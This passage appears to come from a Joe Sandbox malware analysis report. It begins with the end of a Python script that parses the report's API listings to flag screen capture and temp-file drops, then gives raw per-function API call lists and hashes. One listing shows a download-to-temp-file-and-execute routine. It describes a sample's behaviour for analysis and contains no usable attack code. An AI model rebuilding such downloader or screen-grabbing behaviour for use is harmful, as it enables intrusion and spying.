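• DestroyWindow.USER32(?), ref: 00402754
• SetCapture.USER32(?), ref: 004027A1
• GetDC.USER32(00000000), ref: 004027D5
• ReleaseDC.USER32(00000000,00000000), ref: 004027EB
• GetKeyState.USER32(0000001B), ref: 004027F8
• DestroyWindow.USER32(?), ref: 0040280D
"""

# One listing line: "• Name.MODULE(arg,arg), ref: ADDR", "• Name.MODULE ref: ADDR" (no
# argument list) or "• Part of subcall function ADDR: Name.MODULE(...), ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

SRCCOPY = 0x00CC0020  # BitBlt raster operation: straight copy of the source
WM_NAMES = {0x000F: "WM_PAINT", 0x0014: "WM_ERASEBKGND", 0x0100: "WM_KEYDOWN",
            0x0200: "WM_MOUSEMOVE", 0x0201: "WM_LBUTTONDOWN", 0x0202: "WM_LBUTTONUP",
            0x0204: "WM_RBUTTONDOWN", 0x0205: "WM_RBUTTONUP"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # as printed by the report; "?" means unresolved
    ref: int                 # call-site address
    subcall: Optional[int]   # set when the line is marked "Part of subcall function"


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse listing lines; headers, hashes and other report lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return sorted(calls, key=lambda c: c.ref)


def _hex_arg(call: ApiCall, idx: int) -> Optional[int]:
    """Argument idx as an integer, or None when it is missing or unresolved ('?')."""
    try:
        return int(call.args[idx], 16)
    except (IndexError, ValueError):
        return None


def find_screen_capture(calls: List[ApiCall]) -> Optional[Dict[str, int]]:
    """Refs of GetDC(NULL) -> CreateCompatibleBitmap -> CreateCompatibleDC -> SelectObject
    -> BitBlt(SRCCOPY) when they occur in that address order inside the function itself
    (subcall lines are ignored). GetDC(NULL) is the desktop DC, i.e. the whole screen."""
    chain = ["GetDC", "CreateCompatibleBitmap", "CreateCompatibleDC", "SelectObject", "BitBlt"]
    found: Dict[str, int] = {}
    for c in calls:
        if c.subcall is not None or c.name != chain[len(found)]:
            continue
        if c.name == "GetDC" and _hex_arg(c, 0) != 0:
            continue  # a window DC, not the desktop
        # The report prints only the arguments it resolved, so the ROP is taken as the last one.
        if c.name == "BitBlt" and _hex_arg(c, -1) != SRCCOPY:
            continue
        found[c.name] = c.ref
        if len(found) == len(chain):
            return found
    return None


def find_temp_file_drop(calls: List[ApiCall]) -> Optional[Tuple[str, int, int]]:
    """(prefix, GetTempPathW ref, GetTempFileNameW ref) when a temp file name is built."""
    path_ref = None
    for c in calls:
        if c.name == "GetTempPathW":
            path_ref = c.ref
        elif c.name == "GetTempFileNameW" and path_ref is not None:
            return (c.args[1] if len(c.args) > 1 else "?", path_ref, c.ref)
    return None


def describe_messages(calls: List[ApiCall]) -> List[Tuple[int, str]]:
    """Name the window message (2nd argument) forwarded by each DefWindowProcW call."""
    out = []
    for c in calls:
        if c.name == "DefWindowProcW":
            msg = _hex_arg(c, 1)
            out.append((c.ref, WM_NAMES.get(msg, "?" if msg is None else f"0x{msg:04X}")))
    return out


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE_LISTING)
    print("screen capture chain:", {k: hex(v) for k, v in (find_screen_capture(calls) or {}).items()})
    print("temp file drop:", find_temp_file_drop(calls))
    print("messages:", [(hex(r), n) for r, n in describe_messages(calls)])
```

To use it on other entries of the report, paste each function's "APIs" block into parse_api_listing; a function that matches both find_screen_capture and find_temp_file_drop is worth opening in the disassembly at the BitBlt ref to see where the bitmap goes next.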
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                    • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                    • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                    • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                    • Instruction ID: ccde6b9d5692c033315b5ab6a8c795f841b83a804b2d9581facbe1bf21578853
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02B1AD71A002499FEF21DF69C880BAFBBF5BF48314F14416EE59AA7341DB75A8418B20
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                                                                                                                                                                                                                                      • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A631
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A653
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A668
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A673
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A695
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6A8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A6F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A700
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A71D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A735
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 024FA8A3
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C0F
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C21
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C33
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C45
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C57
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C69
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C7B
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C8D
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9C9F
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CB1
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CC3
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CD5
                                                                                                                                                                                                                                                                      • Part of subcall function 024F9BF2: _free.LIBCMT ref: 024F9CE7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA898
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8BA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8CF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8DA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA8FC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA90F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA91D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA928
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA960
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA967
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA984
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA99C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                                    • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction ID: e2f8de537a3546ced4701bae047de9727c572679c1f75b14ebf35eb39c9f07e9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38319C316002119FEBB0AF7AD880B5BBBE9AF80350F11486FEA49D7750DBB0A850CA14
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                    • Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024C2C7E
                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 024C2C94
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 024C2CB0
                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 024C2CC6
                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 024C2CFF
                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 024C2D3B
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 024C2D58
                                                                                                                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 024C2DCF
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 024C2DE4
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                                    • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                                    • Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                    • Instruction ID: aa654bc57c3ad7445d99552aaf86822b21a08c106210855fbb8089566405b2b8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 394160B590021DAEEB20DF649C85FEA77BCFF15705F1080EAA545A2150DFB09E858FA4
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
• GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$ErrorLast
• String ID: advapi32.dll
• API String ID: 2340687224-4050573280
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,024DF228,00000004,024D7D87,00000004,024D8069), ref: 024DEEF9
• GetLastError.KERNEL32(?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000,?), ref: 024DEF05
• LoadLibraryW.KERNEL32(advapi32.dll,?,024DF228,00000004,024D7D87,00000004,024D8069,?,024D8799,?,00000008,024D800D,00000000,?,?,00000000), ref: 024DEF15
• GetProcAddress.KERNEL32(00000000,00447430), ref: 024DEF2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF41
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF58
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF6F
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF86
• GetProcAddress.KERNEL32(00000000,00000000), ref: 024DEF9D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$ErrorLast
• String ID: advapi32.dll
• API String ID: 2340687224-4050573280
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
• GetProcAddress.KERNEL32(00000000), ref: 024D2507
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
APIs
• Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866
  • Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45
• Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
• __CxxThrowException@8.LIBVCRUNTIME ref: 00424898
• Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
• __CxxThrowException@8.LIBVCRUNTIME ref: 0042495C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
• String ID: pContext$switchState
• API String ID: 3151764488-2660820399
APIs
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
• GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
• DuplicateHandle.KERNEL32(00000000), ref: 00419779
• SafeRWList.LIBCONCRT ref: 00419798
  • Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
  • Part of subcall function 00417767: List.LIBCMT ref: 00417782
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
• GetLastError.KERNEL32 ref: 004197B9
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
• __CxxThrowException@8.LIBVCRUNTIME ref: 004197DD
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: eventObject
                                                                                                                                                                                                                                                                    • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                                    • Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                    • Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 024E0C36
                                                                                                                                                                                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024E0C9D
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024E0CBA
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024E0D20
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024E0D35
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024E0D47
                                                                                                                                                                                                                                                                    • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024E0D75
                                                                                                                                                                                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024E0D80
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E0DAC
                                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024E0DBC
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                    • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                    • Instruction ID: 068c6d76c028913e8500f7a1a7223212d1b0cd20cf8b446a062c3265e314c682
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A341B330A042049BEF19FFA6C564BED77A6AF01305F1450AFD8177B282CBB59A09CF61
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                    • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
